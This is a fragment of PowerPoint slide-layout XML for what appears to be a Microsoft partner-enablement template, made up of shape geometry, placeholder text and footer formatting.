                <a:gd name="T3" fmla="*/ 2 h 3"/>
                <a:gd name="T4" fmla="*/ 0 w 2"/>
                <a:gd name="T5" fmla="*/ 3 h 3"/>
                <a:gd name="T6" fmla="*/ 0 w 2"/>
                <a:gd name="T7" fmla="*/ 1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1"/>
                    <a:pt x="2" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="2" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="0"/>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Freeform 447"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5774" y="1153"/>
              <a:ext cx="5" cy="2"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 4"/>
                <a:gd name="T1" fmla="*/ 0 h 2"/>
                <a:gd name="T2" fmla="*/ 3 w 4"/>
                <a:gd name="T3" fmla="*/ 1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1"/>
                    <a:pt x="3" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1"/>
                    <a:pt x="3" y="1"/>
                    <a:pt x="4" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="2"/>
                    <a:pt x="3" y="2"/>
                    <a:pt x="2"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5" name="Freeform: Shape 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-2" y="0"/>
            <a:ext cx="6762953" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 7294818"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 7294818 w 7294818"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 729481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4818" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3978914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7294818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3978914" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683257" y="1562893"/>
            <a:ext cx="5258796" cy="3732214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="274320" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Freeform: Shape 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334508" y="0"/>
            <a:ext cx="1522984" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1319784 w 1522984"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1522984 w 1522984"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 203200 w 1522984"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1522984"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 1319784 w 152298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984" h="6858000">
                <a:moveTo>
                  <a:pt x="1319784" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1522984" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203200" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1319784" y="0"/>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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2718996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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448212" y="6437742"/>
            <a:ext cx="3859607" cy="133860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914367">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="882">
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="499332455"/>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Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448212" y="6437742"/>
            <a:ext cx="3859607" cy="133860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914367">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="882">
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Microsoft Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205411543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1" y="0"/>
            <a:ext cx="12190271" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="gray">
          <a:xfrm>
            <a:off x="448525" y="6033656"/>
            <a:ext cx="1648360" cy="353933"/>
            <a:chOff x="457200" y="1643393"/>
            <a:chExt cx="4492753" cy="964540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="457200" y="1643393"/>
              <a:ext cx="964540" cy="964540"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17"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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="267620" y="1815224"/>
            <a:ext cx="6276593" cy="3583075"/>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239" y="1815224"/>
            <a:ext cx="6276530" cy="1793104"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="146304" tIns="91440" rIns="146304" bIns="91440" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5294" spc="-98" baseline="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="76250">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="51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20" y="3608308"/>
            <a:ext cx="6276530" cy="1789991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="109728" bIns="109728">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3137">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="76250">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="51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24169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invGray">
          <a:xfrm>
            <a:off x="448212" y="6042235"/>
            <a:ext cx="1613565" cy="345698"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1917378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415386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68060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750970004"/>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01822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2591362"/>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0639609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6"/>
            <a:ext cx="9860674" cy="778565"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182880" tIns="146304" rIns="182880" bIns="146304">
            <a:sp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727386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841788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1593267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97569606"/>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7237891"/>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43866624"/>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5056066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563134"/>
            <a:ext cx="11653523" cy="1158793"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7058" spc="-98" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Section title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Right Triangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7314A5C-5E9A-4619-9690-48524B9A8F1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3448049" y="4695825"/>
            <a:ext cx="8743949" cy="2162175"/>
          </a:xfrm>
          <a:prstGeom prst="r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AA1463B1-4C21-488C-B058-3DBAB125CC36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3448047" y="5019675"/>
            <a:ext cx="8743949" cy="1838324"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="1250">
                <a:schemeClr val="accent1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2"/>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6" name="Right Triangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D0A418-1855-4D27-B266-525DF9545DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4762501"/>
            <a:ext cx="9896475" cy="2095500"/>
          </a:xfrm>
          <a:prstGeom prst="r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7" name="Right Triangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC50C8EF-26CF-4E6E-B3E2-6EA3E480DA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5138057"/>
            <a:ext cx="9896475" cy="1719943"/>
          </a:xfrm>
          <a:prstGeom prst="r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 name="Right Triangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{449487D0-1227-4FA6-93A6-AA2BF39AF92E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3789946" y="-3"/>
            <a:ext cx="8402048" cy="1864898"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY0" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2695076"/>
              <a:gd name="connsiteX2" fmla="*/ 8402048 w 8402048"/>
              <a:gd name="connsiteY2" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY3" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY0" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2695076"/>
              <a:gd name="connsiteX2" fmla="*/ 2542668 w 8402048"/>
              <a:gd name="connsiteY2" fmla="*/ 830178 h 2695076"/>
              <a:gd name="connsiteX3" fmla="*/ 8402048 w 8402048"/>
              <a:gd name="connsiteY3" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY4" fmla="*/ 2695076 h 2695076"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY0" fmla="*/ 1864898 h 1864898"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY1" fmla="*/ 794085 h 1864898"/>
              <a:gd name="connsiteX2" fmla="*/ 2542668 w 8402048"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1864898"/>
              <a:gd name="connsiteX3" fmla="*/ 8402048 w 8402048"/>
              <a:gd name="connsiteY3" fmla="*/ 1864898 h 1864898"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 8402048"/>
              <a:gd name="connsiteY4" fmla="*/ 1864898 h 186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048" h="1864898">
                <a:moveTo>
                  <a:pt x="0" y="1864898"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="794085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2542668" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8402048" y="1864898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1864898"/>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9" name="Isosceles Triangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8978C58-367C-4A24-94B0-42E7856A66C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1019174" y="-9526"/>
            <a:ext cx="8632825" cy="1876425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8623300"/>
              <a:gd name="connsiteY0" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX1" fmla="*/ 4311650 w 8623300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1866900"/>
              <a:gd name="connsiteX2" fmla="*/ 8623300 w 8623300"/>
              <a:gd name="connsiteY2" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8623300"/>
              <a:gd name="connsiteY3" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8623300"/>
              <a:gd name="connsiteY0" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX1" fmla="*/ 2768600 w 8623300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1866900"/>
              <a:gd name="connsiteX2" fmla="*/ 8623300 w 8623300"/>
              <a:gd name="connsiteY2" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8623300"/>
              <a:gd name="connsiteY3" fmla="*/ 1866900 h 1866900"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8632825"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1876425"/>
              <a:gd name="connsiteX1" fmla="*/ 2778125 w 8632825"/>
              <a:gd name="connsiteY1" fmla="*/ 9525 h 1876425"/>
              <a:gd name="connsiteX2" fmla="*/ 8632825 w 8632825"/>
              <a:gd name="connsiteY2" fmla="*/ 1876425 h 1876425"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 8632825"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1876425"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8632825" h="1876425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2778125" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8632825" y="1876425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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13460661"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fade/>
  </p:transition>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2688" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="216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19490"/>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93868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320814"/>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17948"/>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5827324"/>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134924546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08777728"/>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Commercial Sales Solution Tours">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43" name="Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA9E55C-7145-44AA-A194-18A56141D1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440637" y="683776"/>
            <a:ext cx="4783277" cy="1421928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4800" b="1" spc="-98">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Partner Practice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4800" b="1" spc="-98" err="1">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enablement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" spc="-98">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F557F69-8913-447D-9AE6-ED17933C30E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6259750" y="2587752"/>
            <a:ext cx="5932250" cy="3439777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3289164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733215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0266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563134"/>
            <a:ext cx="11653523" cy="1158793"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7058" spc="-98" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Section title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Right Triangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7314A5C-5E9A-4619-9690-48524B9A8F1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3448049" y="4695825"/>
            <a:ext cx="8743949" cy="2162175"/>
          </a:xfrm>
          <a:prstGeom prst="r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AA1463B1-4C21-488C-B058-3DBAB125CC36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3448047" y="5019675"/>
            <a:ext cx="8743949" cy="1838324"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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6" name="Right Triangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D0A418-1855-4D27-B266-525DF9545DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4762501"/>
            <a:ext cx="9896475" cy="2095500"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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7" name="Right Triangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
